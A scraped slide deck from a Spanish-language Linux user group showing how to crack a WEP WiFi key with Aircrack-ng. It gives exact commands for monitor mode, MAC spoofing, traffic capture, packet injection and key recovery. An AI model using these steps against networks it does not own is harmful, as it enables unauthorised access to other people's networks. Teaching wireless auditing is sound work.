SlideShare uma empresa Scribd logo
1 de 24
Baixar para ler offline
Aircrack-ng
Experimentando con la Seguridad de  MI Wireless.




                  Alfredo Fiebig C.
           aebig@linuxpuertomontt.cl


          Grupo de Usuarios Linux Puerto Montt

                       GULiPM

                www.linuxpuertomontt.cl




                 January 14, 2011
Sitio Ocial

    www.aircrack-ng.org

    Keys cracking program.

    WEP and WPA-PSK.

    Set of tools for auditing wireless networks.
Sitio Ocial

    www.aircrack-ng.org

    Keys cracking program.

    WEP and WPA-PSK.

    Set of tools for auditing wireless networks.
Sitio Ocial

    www.aircrack-ng.org

    Keys cracking program.

    WEP and WPA-PSK.

    Set of tools for auditing wireless networks.
Sitio Ocial

    www.aircrack-ng.org

    Keys cracking program.

    WEP and WPA-PSK.

    Set of tools for auditing wireless networks.
Modus Operandi


  Opciones

      Slitaz Live CD.

             Disponible en http://www.aircrack-ng.org/
      VMWare.

             Disponible en http://www.aircrack-ng.org/
      Instalar Aircrack-ng en Linux

             Repositorios
             Sources
      El otro sistema operativo de la ventana.

             Requiere de Drivers especiales para cambiar el modeo de la
             tarjeta wireless.

  OJO, No todos los modelos o drivers de wireless son compatibles
Modus Operandi


  Opciones

      Slitaz Live CD.

             Disponible en http://www.aircrack-ng.org/
      VMWare.

             Disponible en http://www.aircrack-ng.org/
      Instalar Aircrack-ng en Linux

             Repositorios
             Sources
      El otro sistema operativo de la ventana.

             Requiere de Drivers especiales para cambiar el modeo de la
             tarjeta wireless.

  OJO, No todos los modelos o drivers de wireless son compatibles
Modus Operandi


  Opciones

      Slitaz Live CD.

             Disponible en http://www.aircrack-ng.org/
      VMWare.

             Disponible en http://www.aircrack-ng.org/
      Instalar Aircrack-ng en Linux

             Repositorios
             Sources
      El otro sistema operativo de la ventana.

             Requiere de Drivers especiales para cambiar el modeo de la
             tarjeta wireless.

  OJO, No todos los modelos o drivers de wireless son compatibles
Modus Operandi


  Opciones

      Slitaz Live CD.

             Disponible en http://www.aircrack-ng.org/
      VMWare.

             Disponible en http://www.aircrack-ng.org/
      Instalar Aircrack-ng en Linux

             Repositorios
             Sources
      El otro sistema operativo de la ventana.

             Requiere de Drivers especiales para cambiar el modeo de la
             tarjeta wireless.

  OJO, No todos los modelos o drivers de wireless son compatibles
Herramientas Necesarias




    1   Red Wi para Vulnerar.

          1   Very Inportant!
    2   aircrack-ng.

          1   apt-get install aircrack-ng
          2   yum install aircrack-ng

    3   macchanger.

          1   apt-get install macchanger
          2   yum install macchanger
    4   Terminator.

          1   Opcional
Herramientas Necesarias




    1   Red Wi para Vulnerar.

          1   Very Inportant!
    2   aircrack-ng.

          1   apt-get install aircrack-ng
          2   yum install aircrack-ng

    3   macchanger.

          1   apt-get install macchanger
          2   yum install macchanger
    4   Terminator.

          1   Opcional
Herramientas Necesarias




    1   Red Wi para Vulnerar.

          1   Very Inportant!
    2   aircrack-ng.

          1   apt-get install aircrack-ng
          2   yum install aircrack-ng

    3   macchanger.

          1   apt-get install macchanger
          2   yum install macchanger
    4   Terminator.

          1   Opcional
Herramientas Necesarias




    1   Red Wi para Vulnerar.

          1   Very Inportant!
    2   aircrack-ng.

          1   apt-get install aircrack-ng
          2   yum install aircrack-ng

    3   macchanger.

          1   apt-get install macchanger
          2   yum install macchanger
    4   Terminator.

          1   Opcional
ATENCION




  PRECAUCION

  DEBE DESCONECTARSE DE TODA RED WIFI EN ESTE
  MOMENTO!!!
Manos a la Obra


   Consola 0

       Activar el Modo Monitor en la interfaz wireless

           airmon-ng start interfaz
       Cambiar la mac del mon0 por una falsa

           ifcong mon0 down
           macchanger -m 00:11:22:33:44:55 mon0
           ifcong mon0 up
       Escaneo Inicial de las Redes

           airodump-ng mon0
           salimos una ves escogemos la red que deseamos estudiar.
       Escuchar traco especico de la red

           airodump-ng -c [canal] -w [nombre red] mon0
           Se puede agregar la opcion bssid mac ap para ser mas
           preciso
Manos a la Obra


   Consola 0

       Activar el Modo Monitor en la interfaz wireless

           airmon-ng start interfaz
       Cambiar la mac del mon0 por una falsa

           ifcong mon0 down
           macchanger -m 00:11:22:33:44:55 mon0
           ifcong mon0 up
       Escaneo Inicial de las Redes

           airodump-ng mon0
           salimos una ves escogemos la red que deseamos estudiar.
       Escuchar traco especico de la red

           airodump-ng -c [canal] -w [nombre red] mon0
           Se puede agregar la opcion bssid mac ap para ser mas
           preciso
Manos a la Obra


   Consola 0

       Activar el Modo Monitor en la interfaz wireless

           airmon-ng start interfaz
       Cambiar la mac del mon0 por una falsa

           ifcong mon0 down
           macchanger -m 00:11:22:33:44:55 mon0
           ifcong mon0 up
       Escaneo Inicial de las Redes

           airodump-ng mon0
           salimos una ves escogemos la red que deseamos estudiar.
       Escuchar traco especico de la red

           airodump-ng -c [canal] -w [nombre red] mon0
           Se puede agregar la opcion bssid mac ap para ser mas
           preciso
Manos a la Obra


   Consola 0

       Activar el Modo Monitor en la interfaz wireless

           airmon-ng start interfaz
       Cambiar la mac del mon0 por una falsa

           ifcong mon0 down
           macchanger -m 00:11:22:33:44:55 mon0
           ifcong mon0 up
       Escaneo Inicial de las Redes

           airodump-ng mon0
           salimos una ves escogemos la red que deseamos estudiar.
       Escuchar traco especico de la red

           airodump-ng -c [canal] -w [nombre red] mon0
           Se puede agregar la opcion bssid mac ap para ser mas
           preciso
Manos a la Obra
Manos a la Obra




   Consola 1

       Nos Asociamos con el AP y mantenemos la comunicacion

           aireplay-ng -1 6000 -a [direccion MAC AP] -h
           00:11:22:33:44:55 mon0
Manos a la Obra




   Consola 2

       Generamos Traco en la red

           aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion
           MAC] -h 00:11:22:33:44:55 mon0
Manos a la Obra




   Consola 3

       Crackeamos la Contraseña

           aircrack-ng -z [nombre red].cap
Manos a la Obra
Resultado

Mais conteúdo relacionado

Mais procurados

Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Websec México, S.C.
 
David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]RootedCON
 
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]RootedCON
 
Cain & abel (sniffer)
Cain & abel (sniffer)Cain & abel (sniffer)
Cain & abel (sniffer)Tensor
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoWebsec México, S.C.
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapWebsec México, S.C.
 
Obtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmObtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmWebsec México, S.C.
 
Tecnologías libres para túneles y VPNs
Tecnologías libres para túneles y VPNsTecnologías libres para túneles y VPNs
Tecnologías libres para túneles y VPNsRodolfo Pilas
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]RootedCON
 
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]RootedCON
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonWebsec México, S.C.
 
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingConferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingHacking Bolivia
 
El libro negro del hacker
El libro negro del hackerEl libro negro del hacker
El libro negro del hackermaster192
 
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirusNoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirusINCIDE
 
Presentacion arp spoofing
Presentacion arp spoofingPresentacion arp spoofing
Presentacion arp spoofingJaime Restrepo
 
Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsTecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsn3xasec
 

Mais procurados (20)

Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013
 
David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]
 
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
 
Esclavizando celulares
Esclavizando celularesEsclavizando celulares
Esclavizando celulares
 
Cain & abel (sniffer)
Cain & abel (sniffer)Cain & abel (sniffer)
Cain & abel (sniffer)
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
 
Obtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmObtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkm
 
Tecnologías libres para túneles y VPNs
Tecnologías libres para túneles y VPNsTecnologías libres para túneles y VPNs
Tecnologías libres para túneles y VPNs
 
Dns spoofing kali linux
Dns spoofing kali linuxDns spoofing kali linux
Dns spoofing kali linux
 
Qué es wep
Qué es wepQué es wep
Qué es wep
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
 
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino Calderon
 
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingConferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical Hacking
 
El libro negro del hacker
El libro negro del hackerEl libro negro del hacker
El libro negro del hacker
 
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirusNoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
 
Practicas hackx crack_05
Practicas hackx crack_05Practicas hackx crack_05
Practicas hackx crack_05
 
Presentacion arp spoofing
Presentacion arp spoofingPresentacion arp spoofing
Presentacion arp spoofing
 
Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsTecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con ids
 

Semelhante a Como usar Aircrack

Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxWaldir Nuñez Francia
 
Herramientas de monitoreo
Herramientas de monitoreoHerramientas de monitoreo
Herramientas de monitoreoTensor
 
Configuracion De Eigrp Y Loopback
Configuracion De Eigrp Y LoopbackConfiguracion De Eigrp Y Loopback
Configuracion De Eigrp Y LoopbackCésar Nuñez
 
Interconexión entre sistemas operativos
Interconexión entre sistemas operativosInterconexión entre sistemas operativos
Interconexión entre sistemas operativosPol Grandes
 
Ejercicios de redes
Ejercicios de redesEjercicios de redes
Ejercicios de redessophiieups
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2 Francesc Perez
 
Manual de instalación de Exchangey tmg 2010
Manual de instalación de Exchangey tmg 2010Manual de instalación de Exchangey tmg 2010
Manual de instalación de Exchangey tmg 2010Hugo Rios
 
Manual de instalación de EXCHANGE y TMG 2010
Manual de instalación de EXCHANGE y TMG 2010Manual de instalación de EXCHANGE y TMG 2010
Manual de instalación de EXCHANGE y TMG 2010Hugo Rios
 
Manual de instalación de EXCHANGE y TMG 2010
Manual de instalación de EXCHANGE y TMG 2010Manual de instalación de EXCHANGE y TMG 2010
Manual de instalación de EXCHANGE y TMG 2010Hugo Rios
 
Administrar una red local en windows
Administrar una red local en windowsAdministrar una red local en windows
Administrar una red local en windowsKoldo Parra
 
W302 ar universal repeter
W302 ar  universal repeterW302 ar  universal repeter
W302 ar universal repetercorpjvi
 
Ejercicios de redes
Ejercicios de redesEjercicios de redes
Ejercicios de redesbetoesmuygay
 
Como usar mi DVR Camtec / Dahua en Windows Xcorp Seguridad
Como usar mi DVR Camtec / Dahua en Windows Xcorp SeguridadComo usar mi DVR Camtec / Dahua en Windows Xcorp Seguridad
Como usar mi DVR Camtec / Dahua en Windows Xcorp SeguridadXcorp Seguridad Spa.
 

Semelhante a Como usar Aircrack (20)

Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislax
 
Herramientas de monitoreo
Herramientas de monitoreoHerramientas de monitoreo
Herramientas de monitoreo
 
Configuracion De Eigrp Y Loopback
Configuracion De Eigrp Y LoopbackConfiguracion De Eigrp Y Loopback
Configuracion De Eigrp Y Loopback
 
Curso linux clase_2_2012
Curso linux clase_2_2012Curso linux clase_2_2012
Curso linux clase_2_2012
 
Interconexión entre sistemas operativos
Interconexión entre sistemas operativosInterconexión entre sistemas operativos
Interconexión entre sistemas operativos
 
Ejercicios de redes
Ejercicios de redesEjercicios de redes
Ejercicios de redes
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Herramientas de Seguridad en Linux
Herramientas de Seguridad en LinuxHerramientas de Seguridad en Linux
Herramientas de Seguridad en Linux
 
Manual de instalación de Exchangey tmg 2010
Manual de instalación de Exchangey tmg 2010Manual de instalación de Exchangey tmg 2010
Manual de instalación de Exchangey tmg 2010
 
Manual de instalación de EXCHANGE y TMG 2010
Manual de instalación de EXCHANGE y TMG 2010Manual de instalación de EXCHANGE y TMG 2010
Manual de instalación de EXCHANGE y TMG 2010
 
Manual de instalación de EXCHANGE y TMG 2010
Manual de instalación de EXCHANGE y TMG 2010Manual de instalación de EXCHANGE y TMG 2010
Manual de instalación de EXCHANGE y TMG 2010
 
Net snmp herramienta_de_monitoreo
Net snmp herramienta_de_monitoreoNet snmp herramienta_de_monitoreo
Net snmp herramienta_de_monitoreo
 
Airodump
AirodumpAirodump
Airodump
 
Administrar una red local en windows
Administrar una red local en windowsAdministrar una red local en windows
Administrar una red local en windows
 
W302 ar universal repeter
W302 ar  universal repeterW302 ar  universal repeter
W302 ar universal repeter
 
Ejercicios de redes
Ejercicios de redesEjercicios de redes
Ejercicios de redes
 
Crack redes wifi
Crack redes wifiCrack redes wifi
Crack redes wifi
 
Tutorial claves-wep
Tutorial claves-wepTutorial claves-wep
Tutorial claves-wep
 
Como usar mi DVR Camtec / Dahua en Windows Xcorp Seguridad
Como usar mi DVR Camtec / Dahua en Windows Xcorp SeguridadComo usar mi DVR Camtec / Dahua en Windows Xcorp Seguridad
Como usar mi DVR Camtec / Dahua en Windows Xcorp Seguridad
 
Linux red + VNC
Linux red + VNCLinux red + VNC
Linux red + VNC
 

Último

Presentación sobre la Inteligencia Artificial
Presentación sobre la Inteligencia ArtificialPresentación sobre la Inteligencia Artificial
Presentación sobre la Inteligencia Artificialcynserafini89
 
Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1ivanapaterninar
 
TALLER DE ANALISIS SOLUCION PART 2 (1)-1.docx
TALLER DE ANALISIS SOLUCION  PART 2 (1)-1.docxTALLER DE ANALISIS SOLUCION  PART 2 (1)-1.docx
TALLER DE ANALISIS SOLUCION PART 2 (1)-1.docxobandopaula444
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxAlexander López
 
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOAREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOnarvaezisabella21
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
Documentacion Electrónica en Actos Juridicos
Documentacion Electrónica en Actos JuridicosDocumentacion Electrónica en Actos Juridicos
Documentacion Electrónica en Actos JuridicosAlbanyMartinez7
 
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del PerúRed Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del PerúCEFERINO DELGADO FLORES
 
Los Microcontroladores PIC, Aplicaciones
Los Microcontroladores PIC, AplicacionesLos Microcontroladores PIC, Aplicaciones
Los Microcontroladores PIC, AplicacionesEdomar AR
 
CommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 TestcontainersCommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 TestcontainersIván López Martín
 
tarea de exposicion de senati zzzzzzzzzz
tarea de exposicion de senati zzzzzzzzzztarea de exposicion de senati zzzzzzzzzz
tarea de exposicion de senati zzzzzzzzzzAlexandergo5
 
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptxModelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptxtjcesar1
 
certificado de oracle academy cetrificado.pdf
certificado de oracle academy cetrificado.pdfcertificado de oracle academy cetrificado.pdf
certificado de oracle academy cetrificado.pdfFernandoOblitasVivan
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxAlexander López
 
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptchaverriemily794
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfjeondanny1997
 
Trabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdfTrabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdfedepmariaperez
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxGESTECPERUSAC
 

Último (20)

Presentación sobre la Inteligencia Artificial
Presentación sobre la Inteligencia ArtificialPresentación sobre la Inteligencia Artificial
Presentación sobre la Inteligencia Artificial
 
Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1
 
TALLER DE ANALISIS SOLUCION PART 2 (1)-1.docx
TALLER DE ANALISIS SOLUCION  PART 2 (1)-1.docxTALLER DE ANALISIS SOLUCION  PART 2 (1)-1.docx
TALLER DE ANALISIS SOLUCION PART 2 (1)-1.docx
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
 
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOAREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 
Documentacion Electrónica en Actos Juridicos
Documentacion Electrónica en Actos JuridicosDocumentacion Electrónica en Actos Juridicos
Documentacion Electrónica en Actos Juridicos
 
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del PerúRed Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
 
Los Microcontroladores PIC, Aplicaciones
Los Microcontroladores PIC, AplicacionesLos Microcontroladores PIC, Aplicaciones
Los Microcontroladores PIC, Aplicaciones
 
CommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 TestcontainersCommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 Testcontainers
 
tarea de exposicion de senati zzzzzzzzzz
tarea de exposicion de senati zzzzzzzzzztarea de exposicion de senati zzzzzzzzzz
tarea de exposicion de senati zzzzzzzzzz
 
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptxModelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
 
certificado de oracle academy cetrificado.pdf
certificado de oracle academy cetrificado.pdfcertificado de oracle academy cetrificado.pdf
certificado de oracle academy cetrificado.pdf
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
 
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
 
Trabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdfTrabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdf
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptx
 

Como usar Aircrack

  • 1. Aircrack-ng Experimentando con la Seguridad de MI Wireless. Alfredo Fiebig C. aebig@linuxpuertomontt.cl Grupo de Usuarios Linux Puerto Montt GULiPM www.linuxpuertomontt.cl January 14, 2011
  • 2. Sitio Ocial www.aircrack-ng.org Keys cracking program. WEP and WPA-PSK. Set of tools for auditing wireless networks.
  • 3. Sitio Ocial www.aircrack-ng.org Keys cracking program. WEP and WPA-PSK. Set of tools for auditing wireless networks.
  • 4. Sitio Ocial www.aircrack-ng.org Keys cracking program. WEP and WPA-PSK. Set of tools for auditing wireless networks.
  • 5. Sitio Ocial www.aircrack-ng.org Keys cracking program. WEP and WPA-PSK. Set of tools for auditing wireless networks.
  • 6. Modus Operandi Opciones Slitaz Live CD. Disponible en http://www.aircrack-ng.org/ VMWare. Disponible en http://www.aircrack-ng.org/ Instalar Aircrack-ng en Linux Repositorios Sources El otro sistema operativo de la ventana. Requiere de Drivers especiales para cambiar el modeo de la tarjeta wireless. OJO, No todos los modelos o drivers de wireless son compatibles
  • 7. Modus Operandi Opciones Slitaz Live CD. Disponible en http://www.aircrack-ng.org/ VMWare. Disponible en http://www.aircrack-ng.org/ Instalar Aircrack-ng en Linux Repositorios Sources El otro sistema operativo de la ventana. Requiere de Drivers especiales para cambiar el modeo de la tarjeta wireless. OJO, No todos los modelos o drivers de wireless son compatibles
  • 8. Modus Operandi Opciones Slitaz Live CD. Disponible en http://www.aircrack-ng.org/ VMWare. Disponible en http://www.aircrack-ng.org/ Instalar Aircrack-ng en Linux Repositorios Sources El otro sistema operativo de la ventana. Requiere de Drivers especiales para cambiar el modeo de la tarjeta wireless. OJO, No todos los modelos o drivers de wireless son compatibles
  • 9. Modus Operandi Opciones Slitaz Live CD. Disponible en http://www.aircrack-ng.org/ VMWare. Disponible en http://www.aircrack-ng.org/ Instalar Aircrack-ng en Linux Repositorios Sources El otro sistema operativo de la ventana. Requiere de Drivers especiales para cambiar el modeo de la tarjeta wireless. OJO, No todos los modelos o drivers de wireless son compatibles
  • 10. Herramientas Necesarias 1 Red Wi para Vulnerar. 1 Very Inportant! 2 aircrack-ng. 1 apt-get install aircrack-ng 2 yum install aircrack-ng 3 macchanger. 1 apt-get install macchanger 2 yum install macchanger 4 Terminator. 1 Opcional
  • 11. Herramientas Necesarias 1 Red Wi para Vulnerar. 1 Very Inportant! 2 aircrack-ng. 1 apt-get install aircrack-ng 2 yum install aircrack-ng 3 macchanger. 1 apt-get install macchanger 2 yum install macchanger 4 Terminator. 1 Opcional
  • 12. Herramientas Necesarias 1 Red Wi para Vulnerar. 1 Very Inportant! 2 aircrack-ng. 1 apt-get install aircrack-ng 2 yum install aircrack-ng 3 macchanger. 1 apt-get install macchanger 2 yum install macchanger 4 Terminator. 1 Opcional
  • 13. Herramientas Necesarias 1 Red Wi para Vulnerar. 1 Very Inportant! 2 aircrack-ng. 1 apt-get install aircrack-ng 2 yum install aircrack-ng 3 macchanger. 1 apt-get install macchanger 2 yum install macchanger 4 Terminator. 1 Opcional
  • 14. ATENCION PRECAUCION DEBE DESCONECTARSE DE TODA RED WIFI EN ESTE MOMENTO!!!
  • 15. Manos a la Obra Consola 0 Activar el Modo Monitor en la interfaz wireless airmon-ng start interfaz Cambiar la mac del mon0 por una falsa ifcong mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifcong mon0 up Escaneo Inicial de las Redes airodump-ng mon0 salimos una ves escogemos la red que deseamos estudiar. Escuchar traco especico de la red airodump-ng -c [canal] -w [nombre red] mon0 Se puede agregar la opcion bssid mac ap para ser mas preciso
